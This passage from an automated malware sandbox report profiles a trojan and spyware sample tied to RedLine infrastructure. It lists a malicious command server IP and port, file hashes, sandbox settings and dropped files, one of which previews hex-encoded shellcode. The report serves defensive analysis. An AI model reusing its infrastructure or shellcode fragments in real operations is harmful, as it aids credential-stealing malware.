http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/0	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.38.142.10:7474t-	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.38.142.10	unknown	Portugal		47674	NETSOLUTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1461860
Start date and time:	2024-06-24 18:23:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YPSvIjQCzd.exe renamed because original name is a hash value
Original Sample Name:	901a623dbccaa22525373cd36195ee14.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/47@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: YPSvIjQCzd.exe

Simulations

Behavior and APIs

Time	Type	Description
12:24:31	API Interceptor	43x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.38.142.10	Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/
185.38.142.10	MSH INV 2024-0117 Secure Payment Invoice for .exe	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETSOLUTIONSNL	Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc	Get hash	malicious	RedLine	Browse	185.38.142.10
	MSH INV 2024-0117 Secure Payment Invoice for .exe	Get hash	malicious	RedLine	Browse	185.38.142.10
	sclfmLKwR7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	3nYvEPuDi1.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	DS4T3FyXbu.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	pDHAW6Eo6E.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.103
	q5TDXPUPJg.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22
	K8pQUoHdUc.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22
	PWkv0lkpNM.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22
	r4S9Lebe4t.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHsLHG1qHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JMO
MD5:	D0D47194D5B74E55C630347DE6A96230
SHA1:	12AF0C6B683051AA403511EC84D3AA54207E27F1
SHA-256:	4F2D52BD8198E047A17A76CEA912DEAEF331E91BF45DE94935967827B692E997
SHA-512:	6A5080E7AEEF7E62ACB7D798B60D2F9D498D8D904A238318A0A985B7C62A4E71E1BE326AA3DDDCB961223A392F06C3E1DB5A46D519DDF48DBF5EB11C4096DF45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\Keily

Download File

Process:	C:\Users\user\Desktop\YPSvIjQCzd.exe
File Type:	data
Category:	dropped
Size (bytes):	97792
Entropy (8bit):	7.014747102810205
Encrypted:	false
SSDEEP:	1536:3f3IwWiew9JOnlc9exhXLpLiw5kvYBnuRJd4d89cpmnn/amKyQH4b:v4wWcJOl0yfLi6RBnGQdCcSTKyw4b
MD5:	F19534A061ECC70BB81126F953505D72
SHA1:	C1613560EA60D1A0407BA6B06EEA10C874512A48
SHA-256:	97D29F1E5E3BB5C8C1EB956C0135A820825973869C1B098705490010E0216FA8
SHA-512:	C9828341199C910F8661A1A6FBFC28C7A00D88C9378247DD57A154906E191AF63E1AB793253A14DE1FE764C28703A48F75CCF16E9840941A2B4A221E23C6F8C6
Malicious:	false
Reputation:	low
Preview:	.i.HYIY1QKJ6..UV.37LPNA1.3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6.TUV],.BP.H.r.C..h.Y<8jF6;2$2^./1 /^'. -z;,_u"$....v>\S)~CL;w3BHZIY1..J6.UVV.;.PNA1S3BH.I[0^Jz6D TVS;7LPNA1m.CHZiY1UKJ6DT.VS.7LPLA1W3BHZIY1QKJ6DTUVS.6LPLA1S3BHYI..UKZ6DDUVS3'LP^A1S3BHJIY1UKJ6DTUV..6L.NA1S.CH.MY1UKJ6DTUVS37LPNA1S.CHVIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UkJ6LTUVS37LPNA1[.BH.IY1UKJ6DTUV}GR4$NA1.@CHZiY1U?K6DVUVS37LPNA1S3BHzIYQ{99D'TUV.77LP.@1S5BHZ?X1UKJ6DTUVS37L.NAq}A'$5*Y1YKJ6D.TVS17LP2@1S3BHZIY1UKJ6.TU.S37LPNA1S3BHZIY1u.K6DTUV.37LRND1.BHj.Y1VKJ6.TUPS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVH.>LpMA1R3BY)HY1_AHHGTURv. j.LA1W.DXZI_BWKJ<a.VVS7.MPNj^W3BBQq.3UKMYATU\D$..XNA0v%]B.@Y1Tn.<ETQ~U37F#IA1Y.g_D.P1UJo.FUUR{57LZ=F1S9.mBT.8UKK..STVW.1LPD26S3H.rHX1S$B6D^Yn.17LBLi8S3HE)@Y1SXNEhUUP@6&H.DA1YNCHZM';UK@%BEQ_ 87LZfM1S9-EZISLTKJ2UP.WS33S_.H1S2g.HHY5}MJ6N'RVS9XBPNK.I-.AZIX...J6@\|SVS9DKPNK"U..AEw.8UKK...UVW.1LPD26S3H:[IYA+AJ6N\|ZVS9.\PNK^]3BBwGH5.JJ6@\|QWS5.@AJ:0S3F`YHY7FM[0lEUVY.aMPNP7E\PHZCJ9GCb%DT_9

C:\Users\user\AppData\Local\Temp\autCDB.tmp

Download File

Process:	C:\Users\user\Desktop\YPSvIjQCzd.exe
File Type:	data
Category:	dropped
Size (bytes):	77430
Entropy (8bit):	7.847295981704258
Encrypted:	false
SSDEEP:	1536:h7JUSmTdZHmVysGL4cdNtKFk8MfCCaeQ6++dzexRW0vqN:h7QZGVysGLDvQffC9Xyxs0vM
MD5:	30AB7658AD775CB44E4B08C7EBC12A2C
SHA1:	5D14B0BFB0AE504148EDC517F41DC0A5992ED935
SHA-256:	8FAD249F983DBF5CAAEF3D72A53210F4A1B2BE6D81B2EB3A59CF7151BF5666C1
SHA-512:	DCB6707E2290CBC21F4C3015E249001AB87A5A26945F4AE9E57D067C8FC135FA1847929F58B1039F9D0A2EB5FC50129B9DD47AF43EA9E4CFC2102EE762A91A70
Malicious:	false
Reputation:	low
Preview:	EA06..~..ZzT..&.1...Sm..V.....:.1...T....U..(.J.Z..1....x...vY..T?T....C.e.....qj.M.s)$....d....' ..r...E$.@#pk...S..t....#0Xum.......x....&.0.R.Sj$..V....1m.P...H....j.L.`.Pf5p...@5...@..f...Uiu............)@....f..8....0......C.U.B? ....J.S..;[... ...h.)...`...63?...`....I..os...N.`cf.....1..@...`....S.7...O$..3.....8& ....Q.A.X..G.u.R..(...R.Q&>\|...j.Vf5`...T...<?.... s.e.A..t..Y...4.E..U.]...T.....+..M~.W.....Z.S....u....P.7...K..h5J.r.$.pk.....%......n.O(.J...3..t.......J..J....Z.J.5..+S.4.9.[hUN..K...:.Z.....I..3.z.T...$.M.....@P......E..0.:.:.h..j........0.....'..it.-..Q..'.......Kh..MN.T..UZ...S...u.."cS.Y...Efk}....=J.S..(U.u.;I...5.Mb)..R....L.`.R....V1...n....U@=:..k4.].. .V....p...W@H....5.R....^.5.P(4...3.X+4...M..-.Z.Z..........P.V.t....b.........*.i.H.Xi.....0....O....J.>.X...5...D.S-..p....H.....W%1.L.S..l.:u.5@...\|.#T..$..-Jsq.M.T.]Bk...)..\|.V.pR(.?..d....U........@.e2.5..h3j%JMJ.`&UZu.kv.Um.JX....I(.J.....]y.I.Noj..

C:\Users\user\AppData\Local\Temp\autD3A.tmp

Download File

Process:	C:\Users\user\Desktop\YPSvIjQCzd.exe
File Type:	data
Category:	modified
Size (bytes):	9840
Entropy (8bit):	7.599061336130256
Encrypted:	false
SSDEEP:	192:6ZxWQa8nm1Wh8fpWAsdzNasmdge/rEoTyRLB7bNZUDLrMZkn:6Zx3a8nmYhzd0smr/rEvRLtZeDXMZo
MD5:	DD1E8868F31121B176C168A4A1B48E63
SHA1:	1A57A6B5DA768E963166B07A13A38EEC98F0878F
SHA-256:	D36E5C68763ED63F3068F5330F4D80488A0294C05663C30ADE57E017EA50F842
SHA-512:	F95B66FBDD3DD81861189ACC96A2C3121493C8109D37C29C68C99B572A37C551AAA44A8632985F4C8335E02D9B33F2C9501791FA3084310031E6E5417B1A6096
Malicious:	false
Reputation:	low
Preview:	EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b

C:\Users\user\AppData\Local\Temp\lophophorine

Download File

Process:	C:\Users\user\Desktop\YPSvIjQCzd.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	dropped
Size (bytes):	28756
Entropy (8bit):	3.5909811262375784
Encrypted:	false
SSDEEP:	768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6gn:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RC
MD5:	C2214B487E6119B5226D591926532EE9
SHA1:	D9A27C71655D441A47A92AA63AAD433F25625FB5
SHA-256:	33CE9852B482618CCE0E5C282FD710E02400CB310CEE839537DB9C2585167ADB
SHA-512:	0AB7541E705BC233A5F834C271C4888CC0F3DA45A7E10E659391CEFEF3082F7D993D94E79629111B35B4D8AFC3BACB83EA0BF57BA737C1B6D956825EF2A7C939
Malicious:	false
Reputation:	low
Preview:	A9E499CD8C02898115CEA73647257D6D456782227821727D946E9B8E916AF2AC47BE395D80BBCF6E100x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\Temp\tmp1AF5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B06.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B17.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B18.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B28.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B29.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B3A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B3B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B4C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp342A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696835919052288
Encrypted:	false
SSDEEP:	24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
MD5:	197C0DB71198B230CF6568A2AA40C23B
SHA1:	BAE63DD78D567ED9183C0F8D72A191191745C4E5
SHA-256:	6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
SHA-512:	972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
Malicious:	false
